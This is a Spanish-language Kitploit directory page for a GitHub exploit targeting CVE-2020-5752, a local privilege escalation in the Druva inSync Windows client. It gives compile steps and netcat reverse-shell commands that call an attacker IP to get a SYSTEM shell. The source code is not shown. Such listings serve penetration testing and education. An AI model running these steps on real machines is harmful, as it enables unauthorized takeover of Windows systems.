Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-5752 — Escalación de Privilegios Local para Druva | Kitploit
Herramientas/GitHubGitHub/x0rbeexd/cve-2020-5752
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Escalación de Privilegios Local para Druva

Ver Repositorio
11hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-5752: Druva inSync Escalada de Privilegios Local

Un exploit en C para el Cliente Windows de Druva inSync (v6.6.3 y anteriores). La aplicación expone un servicio RPC en el puerto 6064 que es vulnerable a inyección de comandos mediante path traversal. Esto permite a un usuario local ejecutar comandos arbitrarios como NT AUTHORITY\SYSTEM.

Detalles de la Vulnerabilidad

  • CVE: 2020-5752
  • Probado en: Windows 10 (x64)
  • Nivel de privilegio: Escalada de Privilegios Local (LPE)

Uso

1. Compilación

Utilice gcc (MinGW) para compilar el código fuente:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Preparación

Coloque una copia de nc.exe en un directorio accesible por la cuenta SYSTEM (por ejemplo, C:\Windows\Tasks).

3. Ejecución

Inicie un listener en su máquina atacante:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Aviso Legal

Esta herramienta es solo para fines educativos. El uso no autorizado en sistemas para los que no tiene permiso de prueba es ilegal.

Descargar herramienta